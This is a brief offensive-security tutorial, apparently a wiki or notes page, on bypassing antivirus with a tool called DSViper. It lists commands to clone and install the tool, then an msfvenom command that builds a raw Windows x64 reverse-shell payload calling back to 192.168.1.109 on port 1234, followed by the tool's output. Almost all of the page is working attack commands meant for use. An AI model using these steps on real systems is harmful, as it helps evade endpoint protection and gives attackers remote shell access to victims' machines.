AV Bypass using DSViper

Install DSViper

git clone https://github.com/dagowda/DSViper.git
cd DSViper
python3 -m venv env
source env/bin/activate
chmod +x install_dependencies.sh
./install_dependencies.sh
 ./DSViper

Create Shellcode

 msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.109 LPORT=1234 -f raw > payload.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes

Last updated